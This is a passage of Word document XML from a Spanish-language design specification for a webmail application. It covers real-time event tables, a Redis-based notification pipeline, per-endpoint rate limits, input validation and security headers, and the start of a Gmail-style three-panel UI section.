              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">draft:saved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{draftId, savedAt}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Confirmación de auto-save</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sync:completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId, folderId, added, updated, deleted}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sincronización completada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sync:error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{accountId, error: string}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Error en sincronización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">calendar:eventUpdated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Server → Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{calendarId, eventId, type: 'created' \| 'updated' \| 'deleted'}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cambio en calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El pipeline de notificaciones sigue la arquitectura: IMAP IDLE detecta cambio → IMAP Manager publica evento a Redis Pub/Sub en canal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">notifications:{userId}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Socket.IO server (suscrito al canal) recibe evento y retransmite a la room del usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[138]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[139]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[162]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Si WebSocket no está disponible, el frontend transita transparentemente a polling adaptativo de 30-60 segundos usando el comando IMAP STATUS para comparar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDNEXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNSEEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con valores cacheados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="98" w:name="rate-limiting-y-seguridad"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.10 Rate Limiting y Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todos los endpoints están protegidos por rate limiting basado en el algoritmo Sliding Window implementado con Redis Sorted Sets (ZSET)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[158]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La configuración por endpoint varía según su sensibilidad y costo computacional:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1885"/>
        <w:gridCol w:w="1697"/>
        <w:gridCol w:w="1508"/>
        <w:gridCol w:w="2828"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ventana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Límite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5 intentos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prevenir fuerza bruta contra credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/auth/refresh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 intentos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitar rotación de tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 hora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 creaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prevenir spam de cuentas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/accounts/:id/sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3 sincronizaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evitar sobrecarga de servidores IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/send</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10 envíos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Limitar spam saliente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/attachments/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 hora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">50 uploads (1GB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Control de uso de storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/accounts/*/emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">120 requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proteger listados frecuentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH /api/drafts/*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30 requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Auto-save frecuente pero limitado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El rate limiting se implementa mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZREMRANGEBYSCORE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para eliminar timestamps viejos seguido de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ZCARD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para contar requests en la ventana actual, ofreciendo precisión de nivel de request sin el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">burst effect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de los límites de ventana fija</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[156]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La validación de inputs en todos los endpoints utiliza los JSON Schema nativos de Fastify, que compilan los schemas en funciones de validación optimizadas en tiempo de arranque. Los schemas de request definen: tipos de datos, rangos numéricos, patrones regex para emails (RFC 5322), y campos requeridos. Los schemas de response garantizan que solo los campos definidos se serializan, previniendo filtración accidental de datos sensibles (como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">authCredentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en las responses de accounts, que se excluye explícitamente mediante el schema de response)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los headers de seguridad se configuran globalmente en Fastify:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Strict-Transport-Security: max-age=31536000; includeSubDomains</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y una Content Security Policy estricta que bloquea scripts inline, eval, y contenido de orígenes no whitelisteados. Estas cabeceras complementan la sanitización HTML de DOMPurify y el iframe sandbox para renderizado de emails, formando una estrategia defense-in-depth contra vectores XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="98"/>
    <w:bookmarkEnd w:id="99"/>
    <w:bookmarkStart w:id="119" w:name="diseño-uiux-gmail-style"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Diseño UI/UX: Gmail-Style</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La decisión de UX con mayor impacto en Webmail 6.0 es la adopción del layout de tres paneles de Gmail con conversation threading, pues constituye lo que los usuarios esperan de un cliente de correo moderno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[101]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Gmail fue diseñado intencionalmente para la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">simplicidad gozosa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— el diseñador Kevin Fox buscaba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la alegría de la confianza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, donde la interfase no interfiere, haciendo las interacciones sin fricción</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[13]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Webmail 6.0 replica este enfoque mediante un layout de tres paneles responsivo, vista de conversaciones con el algoritmo JWZ, un editor WYSIWYG basado en Tiptap 2, atajos de teclado estilo Gmail y virtual scrolling para listas grandes.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="103" w:name="layout-de-tres-paneles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Layout de Tres Paneles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El layout de tres paneles es el estándar de facto para interfaces de webmail: la barra lateral izquierda sirve como navegación primaria con carpetas y etiquetas, el panel central muestra la lista de correos en vista de conversación, y el panel derecho de lectura (reading pane) muestra el contenido completo del mensaje seleccionado sin navegar away</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[101]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Este diseño evolucionó desde la interfase de panel único de 2004 hasta la estructura multi-panel actual, con el Preview Pane introducido vía Gmail Labs en 2011 hasta convertirse en opción estándar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[101]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="100" w:name="sidebar-izquierda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1.1 Sidebar Izquierda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El sidebar izquierda tiene un ancho fijo de 256px en desktop y contiene cuatro secciones principales: selector de cuentas, árbol de carpetas/etiquetas, acceso rápido al calendario, y contactos. El selector de cuentas emplea un componente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;select&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">estilizado de Headless UI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@headlessui/vue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) con transición animada entre cuentas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[49]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El árbol de carpetas implementa un componente Tree de Radix Vue con soporte WAI-ARIA para navegación por teclado, expandir/colapsar carpetas anidadas, y drag-and-drop para reordenar carpetas personalizadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[125]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada carpeta en el árbol muestra tres elementos: nombre de carpeta, contador de mensajes no leídos (badge circular con fondo rojo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#EA4335</w:t>
      </w:r>
      <w:r>
